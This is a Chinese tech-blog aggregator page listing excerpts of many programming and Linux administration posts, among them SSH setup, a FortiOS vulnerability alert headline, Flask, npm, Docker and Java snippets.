    使用方法sshusername@ipaddress[inputpasswd]root用户默认无法由ssh连接,可以通过修改配置sudovim/etc/ssh/sshd_config去掉PermitRootLogin前的‘#’,并修改为PermitRootLoginyes重启sshd服务sudosystemctlrestartsshd参考https://linuxconfig.org/enable-
  • 【漏洞预警】FortiOS 和 FortiProxy 身份认证绕过漏洞(CVE-2024-55591) 李火火安全阁 漏洞预警Fortinet
    文章目录一、产品简介二、漏洞描述三、影响版本四、漏洞检测方法五、解决方案一、产品简介FortiOS是Fortinet公司核心的网络安全操作系统,广泛应用于FortiGate下一代防火墙,为用户提供防火墙、VPN、入侵防御、应用控制等多种安全功能。FortiProxy则是Fortinet提供的企业级安全代理产品,主要用于内容过滤、Web访问控制和数据安全防护等场景。下一代防火墙产品FortiGate
  • python使用Flask框架创建一个简单的动态日历 镜花照无眠 #Pythonpythonflask开发语言
    0.运行效果运行代码,然后在浏览器中访问http://127.0.0.1:5000/,将看到一个动态日历,能够通过点击按钮切换月份。1.安装Flask首先,确保你已经安装了Flask。如果没有,可以使用以下命令安装:pipinstallFlask测试:fromflaskimportFlask#fromflaskimportFlask,render_template,requestapp=Flask
  • npm install CERT_HAS_EXPIRED解决方法 奔跑吧邓邓子 常见问题解答(FAQ)npm前端node.jsexpirednpminstall
    提示:“奔跑吧邓邓子”的常见问题专栏聚焦于各类技术领域常见问题的解答。涵盖操作系统(如CentOS、Linux等)、开发工具(如AndroidStudio)、服务器软件(如Zabbix、JumpServer、RocketMQ等)以及远程桌面、代码克隆等多种场景。针对如远程桌面无法复制粘贴、Kubernetes报错、自启动报错、各类软件安装报错、内存占用问题、网络连接问题等提供了详细的问题描述与有效
  • 100条Linux命令汇总 Xudde. 笔记笔记linux学习运维
    本文章为个人成长笔记之一,感谢您的阅览。内容简介文件和目录操作命令(14个)查看文件及内容处理命令(14个)文件压缩及解压缩命令(4个)信息显示命令(11个)用户管理命令(10个)基础网络操作命令(12个)进程管理相关命令(15个)其他常用命令(10个)文件和目录操作命令(14个)ls:列出目录的内容及其内容属性信息。cd:从当前工作目录切换到指定工作目录。cp:复制文件或目录。find:用于查找
  • 如何切换npm到淘宝的最新镜像源? cesske npm
    目录前言一、查看当前npm镜像源二、切换到淘宝镜像源三、验证是否成功切换四、其他注意事项总结前言要切换npm到淘宝的最新镜像源,您可以按照以下步骤操作:一、查看当前npm镜像源在更改npm镜像源之前,首先需要查看当前npm正在使用的镜像源地址。您可以通过在命令行(如Windows的CMD、PowerShell或Linux/macOS的Terminal)中输入以下命令来查看:npmconfigget
  • 你能读懂微服务架构深度解析:架构设计背后的哲学吗? 写代码的珏秒秒 程序员Java编程java架构程序人生后端微服务
    架构设计哲学如果说软件开发的本质是不断挖掘问题领域中隐藏的错综复杂性,那么架构解决的问题就是如何管理这些复杂性。而在软件领域,最为复杂的软件实体莫过于软件操作系统。从数以千计的工程师参与开发的UNIX操作系统到Linux开源系统的成功,越来越多的人开始关注和思考UNIX技术背后隐藏的设计哲学。UNIX设计哲学概括为一句话就是“小而专注”。可以说,微服务架构理念和UNIX设计哲学一脉相承,微服务将U
  • Android实战技巧之五十:App的系统签名 全速前行 AndroidAndroid实战技巧系统签名sign
    这件事困扰我们多时了。我们一直想用非源码编译的方式解决此事,按如下步骤。这种获取系统签名的方法如下:1、apk中需要使用android:sharedUserId=”android.uid.system”这个属性。在Manifest文件修改,如下:2、将app做无签名编译(AndroidStudio)用命令行编译Windows:gradlew.batassembleReleaseMac/linux:
  • Python path模块 倾听冷暖 python策略模式开发语言
    在Python中,你可能说的是os.path模块(它属于os模块下专门处理路径相关操作的部分)或者是pathlib模块(Python标准库中用于面向对象风格的路径操作模块),以下分别为你详细介绍这两种与路径相关的内容:os.path模块os.path模块提供了一系列用于处理文件路径的实用函数,能帮助开发者方便地操作路径、获取路径相关信息等,且可以适配不同的操作系统(Windows、Linux、ma
  • linux中网卡配置,两张网卡,分别用于内网和外网的通信 橘橘子~ Linuxlinux
    环境:centos7、VMware一、一张网卡实现内网通信(不能访问外网):1.首先查看已有的网卡:[root@localhost~]#ipaddr我的默认网卡是ens332.VMware右下角打开设置第一张网卡ens33:3.选择VMnet14.打开真机的网络连接查看网段,我的为112网段:5.配置网卡文件:<
  • 如何从0开始写一个操作系统 c后端
    本贴用来记录作者用c语言写一个操作系统,主要参考《操作系统真相还原》一书写的,同时也会对书里的代码和linux进行对比,尽量看一下现代操作系统中是如何实现的。原书的代码https://github.com/yifengyou/os-elephant/tree/master我会挑一些说说传统的操作系统课一般从内存,虚拟化等等方面讲起,因为是自己实现操作系统,肯定不能一上来就写开始写内存管理这种大活,
  • LoadRunner如何监控Linux系统资源
    使用LoadRunner监控Linux系统资源的步骤详解LoadRunner是一个广泛使用的性能测试工具,支持对Web应用程序、服务器和整个基础设施进行负载测试。在监控Linux系统资源方面,LoadRunner通过集成监控代理(Agent)来收集并显示有关CPU、内存、磁盘等系统资源的详细信息。以下是通过LoadRunner监控Linux系统资源的详细步骤:1.安装LoadRunnerAgent
  • linux中启动rpc.rstat监控
    在Linux中启动rpc.rstatd监控服务的步骤详解rpc.rstatd服务是一个用于收集远程主机性能统计信息的服务,常见于UNIX类系统中,通常与rpcbind一起工作,提供系统的CPU、内存、磁盘等资源的实时监控数据。在Linux系统中,启用并配置rpc.rstatd服务可以帮助管理员实时获取系统的性能信息,便于后续的监控和分析。接下来,将详细介绍如何在Linux中启动并配置rpc.rst
  • Flask 和阿里云 OSS 实现文件上传功能 ivwdcwso 开发flask阿里云pythonoss
    在本教程中,我们将学习如何使用Flask框架和阿里云对象存储服务(OSS)来创建一个简单而强大的文件上传应用。这个应用将允许用户通过Web界面上传文件,然后将文件安全地存储到阿里云OSS中,并返回可访问的文件URL。准备工作在开始之前,请确保您已经完成以下准备工作:安装Python(推荐Python3.7+)安装Flask:pipinstallflask安装阿里云OSSSDK:pipinstall
  • 百度指数+selenium+request+比特指纹浏览器+pywebview+pandas+flask过程性 万山y pythonselenium爬虫flaskpandas
    1.cookies和headrs问题使用selenium获得的cookies测试没有问题,但是获得的heards头不可以使用,经过测试比较需要添加或者修改几项重点的heards为{'Cipher-Text':'1704885072633_1704970047346_SlMkwPX0ZnotTaSrpOEx50xhLlPT5iMH867nxTtYuapcdPhsh2d2ooVE2F+RSm+yhIF
  • ubuntu安装miniconda MWbayern ubuntu
    Anaconda是一个开源的Python包管理器,而Miniconda则是轻量级的Anaconda下载地址ubuntu安装在下载地址里面下载相应文件或者sudoapt-getinstallwgetwgethttps://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh之后运行该文件bashMiniconda3-latest-
  • linux进程sl状态,linux进程状态s和sl的区别 weixin_39830688 linux进程sl状态
    PROCESSSTATECODESHerearethedifferentvaluesthatthes,statandstateoutputspecifiers(header"STAT"or"S")willdisplaytodescribethestateofaprocess:Duninterruptiblesleep(usuallyIO)IIdlekernelthreadRrunningorrun
  • linux进程状态Ds,Linux下ps aux中进程状态为Ss,S+, Rs,Ds是什么意思? weixin_39816062 linux进程状态Ds
    系统维护的时候难免会遇到进程的状态的查询和管理,到底什么是R,有的是S,有的还是S+呢?一直有些混沌的问题,今天细细的来总结一下:PS是用来报告系统中程序执行状况的命令这个是无可厚非的,linux进程的状态:D不可中断睡眠(通常是在IO操作)收到信号不唤醒和不可运行,进程必须等待直到有中断发生R正在运行或可运行(在运行队列排队中)S可中断睡眠(休眠中,受阻,在等待某个条件的形成或接受到信号)T已停
  • linux进程状态 DW,c - 诊断进程陷入D状态(不间断睡眠/阻塞IO) - SO中文参考 - www.soinside.com... 咔咔鲁斯 linux进程状态DW
    我们正在开发一个嵌入式Linux系统,使用Live555WIS-Streamer通过网络在RTSP上传输视频。在一个特定的系统中,我们看到WIS-Streamer卡在TASK_UNINTERRUPTIBLE状态;从命令行:进程的ps状态显示为DW,WIS进程的子进程都列为Zombie状态。一旦我们处于这种状态,看起来我们无能为力,除了重启(不可取)。然而,我们真的很想找到这个的根本原因-我怀疑在流
  • linux 进程状态显示dl,Linux系统中的实时调度器DL调度器的原理是什么?详细概述... 筱潄艾尼 linux进程状态显示dl
    一、概述实时系统是这样的一种计算系统:当事件发生后,它必须在确定的时间范围内做出响应。在实时系统中,产生正确的结果不仅依赖于系统正确的逻辑动作,而且依赖于逻辑动作的时序。换句话说,当系统收到某个请求,会做出相应的动作以响应该请求,想要保证正确地响应该请求,一方面逻辑结果要正确,更重要的是需要在最后期限(deadline)内作出响应。如果系统未能在最后期限内进行响应,那么该系统就会产生错误或者缺陷。
  • 如何使用Tar命令在Linux系统中解压各种文件格式 wx_tangjinjinwx linux服务器运维
    如何使用Tar命令在Linux系统中解压各种文件格式大家好,我是微赚淘客返利系统3.0的小编,是个冬天不穿秋裤,天冷也要风度的程序猿!tar命令是Linux系统中一个非常强大的工具,主要用于归档和压缩文件。它支持多种压缩格式,如.tar、.gz、.bz2、.xz等。本文将详细介绍如何使用tar命令解压各种文件格式,包括常见的.tar、.tar.gz、.tar.bz2、.tar.xz等。1.解压.t
  • linux进程状态 Ss,Ss+,D,R+,S< Thinkcortex Linux
    ps-auxHerearethedifferentvaluesthatthes,statandstateoutputspecifiers(header"STAT"or"S")willdisplaytodescribethestateofaprocess:Duninterruptiblesleep(usuallyIO)Rrunningorrunnable(onrunqueue)Sinterrupti
  • docker arm/amd双架构镜像制作 码农在失业 dockerdocker容器
    多架构打包DockerforLinux不支持构建arm架构镜像,我们可以运行一个新的容器让其支持该特性,Docker桌面版无需进行此项设置。dockerrun--rm--privilegedtonistiigi/binfmt:latest--installall由于Docker默认的builder实例不支持同时指定多个--platform,我们必须首先创建一个新的builder实例dockerbu
  • 运行.py文件 战斗的大熊 pythonpython
    运行.py文件一、使用命令行‌打开命令行终端‌在Windows上,你可以按下Win+R键,然后输入cmd并回车,或者通过开始菜单搜索“命令提示符”并打开。在Mac或Linux上,你可以在应用程序或搜索中找到并打开Terminal。‌导航到.py文件所在的目录‌使用cd命令来切换目录。(注意cd命令跳转目录,如果是和当前不同的磁盘,需要增加/d命令,例如cd/dD:\目标目录)例如,如果你的.py文
  • mondb入手 木zi_鸣 mongodb
    windows 启动mongodb  编写bat文件, mongod --dbpath D:\software\MongoDBDATA mongod --help  查询各种配置 配置在mongob 打开批处理,即可启动,27017原生端口,shell操作监控端口  扩展28017,web端操作端口 启动配置文件配置, 数据更灵活 
  • 大型高并发高负载网站的系统架构 bijian1013 高并发负载均衡
            扩展Web应用程序 一.概念         简单的来说,如果一个系统可扩展,那么你可以通过扩展来提供系统的性能。这代表着系统能够容纳更高的负载、更大的数据集,并且系统是可维护的。扩展和语言、某项具体的技术都是无关的。扩展可以分为两种:         1.
  • DISPLAY变量和xhost(原创) czmmiao display
    DISPLAY 在Linux/Unix类操作系统上, DISPLAY用来设置将图形显示到何处. 直接登陆图形界面或者登陆命令行界面后使用startx启动图形, DISPLAY环境变量将自动设置为:0:0, 此时可以打开终端, 输出图形程序的名称(比如xclock)来启动程序, 图形将显示在本地窗口上, 在终端上输入printenv查看当前环境变量, 输出结果中有如下内容:DISPLAY=:0.0
  • 获取B/S客户端IP 周凡杨 java编程jspWeb浏览器
       最近想写个B/S架构的聊天系统,因为以前做过C/S架构的QQ聊天系统,所以对于Socket通信编程只是一个巩固。对于C/S架构的聊天系统,由于存在客户端Java应用,所以直接在代码中获取客户端的IP,应用的方法为:    String ip = InetAddress.getLocalHost().getHostAddress(); 然而对于WEB
  • 浅谈类和对象 朱辉辉33 编程
        类是对一类事物的总称,对象是描述一个物体的特征,类是对象的抽象。简单来说,类是抽象的,不占用内存,对象是具体的, 占用存储空间。     类是由属性和方法构成的,基本格式是public  class 类名{ //定义属性 private/public 数据类型 属性名; //定义方法 publ
  • android activity与viewpager+fragment的生命周期问题 肆无忌惮_ viewpager
    有一个Activity里面是ViewPager,ViewPager里面放了两个Fragment。 第一次进入这个Activity。开启了服务,并在onResume方法中绑定服务后,对Service进行了一定的初始化,其中调用了Fragment中的一个属性。 super.onResume(); bindService(intent, conn, BIND_AUTO_CREATE);
  • base64Encode对图片进行编码 843977358 base64图片encoder
    /** * 对图片进行base64encoder编码 * * @author mrZhang * @param path * @return */ public static String encodeImage(String path) { BASE64Encoder encoder = null; byte[] b = null; I
  • Request Header简介 aigo servlet
    当一个客户端(通常是浏览器)向Web服务器发送一个请求是,它要发送一个请求的命令行,一般是GET或POST命令,当发送POST命令时,它还必须向服务器发送一个叫“Content-Length”的请求头(Request   Header)   用以指明请求数据的长度,除了Content-Length之外,它还可以向服务器发送其它一些Headers,如:    
  • HttpClient4.3 创建SSL协议的HttpClient对象 alleni123 httpclient爬虫ssl
    public class HttpClientUtils { public static CloseableHttpClient createSSLClientDefault(CookieStore cookies){ SSLContext sslContext=null; try { sslContext=new SSLContextBuilder().l
  • java取反 -右移-左移-无符号右移的探讨 百合不是茶 位运算符 位移
    取反: 在二进制中第一位,1表示符数,0表示正数 byte a = -1; 原码:10000001 反码:11111110 补码:11111111 //异或: 00000000 byte b = -2; 原码:10000010 反码:11111101 补码:11111110 //异或: 00000001
  • java多线程join的作用与用法 bijian1013 java多线程
            对于JAVA的join,JDK 是这样说的:join public final void join (long millis )throws InterruptedException Waits at most millis milliseconds for this thread to die. A timeout of 0 means t
  • Java发送http请求(get 与post方法请求) bijian1013 javaspring
    PostRequest.java package com.bijian.study; import java.io.BufferedReader; import java.io.DataOutputStream; import java.io.IOException; import java.io.InputStreamReader; import java.net.HttpURL
  • 【Struts2二】struts.xml中package下的action配置项默认值 bit1129 struts.xml
    在第一部份,定义了struts.xml文件,如下所示:   <!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN" "http://struts.apache.org/dtds/struts
  • 【Kafka十三】Kafka Simple Consumer bit1129 simple
    代码中关于Host和Port是割裂开的,这会导致单机环境下的伪分布式Kafka集群环境下,这个例子没法运行。 实际情况是需要将host和port绑定到一起,   package kafka.examples.lowlevel; import kafka.api.FetchRequest; import kafka.api.FetchRequestBuilder; impo
  • nodejs学习api ronin47 nodejs api
    NodeJS基础 什么是NodeJS JS是脚本语言,脚本语言都需要一个解析器才能运行。对于写在HTML页面里的JS,浏览器充当了解析器的角色。而对于需要独立运行的JS,NodeJS就是一个解析器。 每一种解析器都是一个运行环境,不但允许JS定义各种数据结构,进行各种计算,还允许JS使用运行环境提供的内置对象和方法做一些事情。例如运行在浏览器中的JS的用途是操作DOM,浏览器就提供了docum
  • java-64.寻找第N个丑数 bylijinnan java
    public class UglyNumber { /** * 64.查找第N个丑数 具体思路可参考 [url] http://zhedahht.blog.163.com/blog/static/2541117420094245366965/[/url] * 题目:我们把只包含因子 2、3和5的数称作丑数(Ugly Number)。例如6、8都是丑数,但14
  • 二维数组(矩阵)对角线输出 bylijinnan 二维数组
    /** 二维数组 对角线输出 两个方向 例如对于数组: { 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 9, 10, 11, 12 }, { 13, 14, 15, 16 }, slash方向输出: 1 5 2 9 6 3 13 10 7 4 14 11 8 15 12 16 backslash输出: 4 3
  • [JWFD开源工作流设计]工作流跳跃模式开发关键点(今日更新) comsci 工作流
       既然是做开源软件的,我们的宗旨就是给大家分享设计和代码,那么现在我就用很简单扼要的语言来透露这个跳跃模式的设计原理    大家如果用过JWFD的ARC-自动运行控制器,或者看过代码,应该知道在ARC算法模块中有一个函数叫做SAN(),这个函数就是ARC的核心控制器,要实现跳跃模式,在SAN函数中一定要对LN链表数据结构进行操作,首先写一段代码,把
  • redis常见使用 cuityang redis常见使用
    redis 通常被认为是一个数据结构服务器,主要是因为其有着丰富的数据结构 strings、map、 list、sets、 sorted sets 引入jar包 jedis-2.1.0.jar  (本文下方提供下载) package redistest; import redis.clients.jedis.Jedis; public class Listtest
  • 配置多个redis dalan_123 redis
    配置多个redis客户端 <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"       xmlns:xsi=&quo
  • attrib命令 dcj3sjt126com attr
      attrib指令用于修改文件的属性.文件的常见属性有:只读.存档.隐藏和系统.    只读属性是指文件只可以做读的操作.不能对文件进行写的操作.就是文件的写保护.    存档属性是用来标记文件改动的.即在上一次备份后文件有所改动.一些备份软件在备份的时候会只去备份带有存档属性的文件. 
  • Yii使用公共函数 dcj3sjt126com yii
    在网站项目中,没必要把公用的函数写成一个工具类,有时候面向过程其实更方便。 在入口文件index.php里添加 require_once('protected/function.php'); 即可对其引用,成为公用的函数集合。 function.php如下:   <?php /**   * This is the shortcut to D
  • linux 系统资源的查看(free、uname、uptime、netstat) eksliang netstatlinux unamelinux uptimelinux free
    linux 系统资源的查看 转载请出自出处:http://eksliang.iteye.com/blog/2167081   http://eksliang.iteye.com 一、free查看内存的使用情况 语法如下:   free [-b][-k][-m][-g] [-t] 参数含义 -b:直接输入free时,显示的单位是kb我们可以使用b(bytes),m
  • JAVA的位操作符 greemranqq 位运算JAVA位移<<>>>
    最近几种进制,加上各种位操作符,发现都比较模糊,不能完全掌握,这里就再熟悉熟悉。   1.按位操作符 :    按位操作符是用来操作基本数据类型中的单个bit,即二进制位,会对两个参数执行布尔代数运算,获得结果。    与(&)运算:    1&1 = 1, 1&0 = 0, 0&0 &
  • Web前段学习网站 ihuning Web
      Web前段学习网站 菜鸟学习:http://www.w3cschool.cc/   JQuery中文网:http://www.jquerycn.cn/   内存溢出:http://outofmemory.cn/#csdn.blog   http://www.icoolxue.com/   http://www.jikexue
  • 强强联合:FluxBB 作者加盟 Flarum justjavac r
    原文:FluxBB Joins Forces With Flarum作者:Toby Zerner译文:强强联合:FluxBB 作者加盟 Flarum译者:justjavac FluxBB 是一个快速、轻量级论坛软件,它的开发者是一名德国的 PHP 天才 Franz Liedke。FluxBB 的下一个版本(2.0)将被完全重写,并已经开发了一段时间。FluxBB 看起来非常有前途的,
  • java统计在线人数(session存储信息的) macroli javaWeb
    这篇日志是我写的第三次了 前两次都发布失败!郁闷极了!   由于在web开发中常常用到这一部分所以在此记录一下,呵呵,就到备忘录了! 我对于登录信息时使用session存储的,所以我这里是通过实现HttpSessionAttributeListener这个接口完成的。 1、实现接口类,在web.xml文件中配置监听类,从而可以使该类完成其工作。 public class Ses
  • bootstrp carousel初体验 快速构建图片播放 qiaolevip 每天进步一点点学习永无止境bootstrap纵观千象
    img{ border: 1px solid white; box-shadow: 2px 2px 12px #333; _width: expression(this.width > 600 ? "600px" : this.width + "px"); _height: expression(this.width &
  • SparkSQL读取HBase数据,通过自定义外部数据源 superlxw1234 sparksparksqlsparksql读取hbasesparksql外部数据源
    关键字:SparkSQL读取HBase、SparkSQL自定义外部数据源     前面文章介绍了SparSQL通过Hive操作HBase表。   SparkSQL从1.2开始支持自定义外部数据源(External DataSource),这样就可以通过API接口来实现自己的外部数据源。这里基于Spark1.4.0,简单介绍SparkSQL自定义外部数据源,访
  • Spring Boot 1.3.0.M1发布 wiselyman spring boot
        Spring Boot 1.3.0.M1于6.12日发布,现在可以从Spring milestone repository下载。这个版本是基于Spring Framework 4.2.0.RC1,并在Spring Boot 1.2之上提供了大量的新特性improvements and new features。主要包含以下:   1.提供一个新的sprin
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他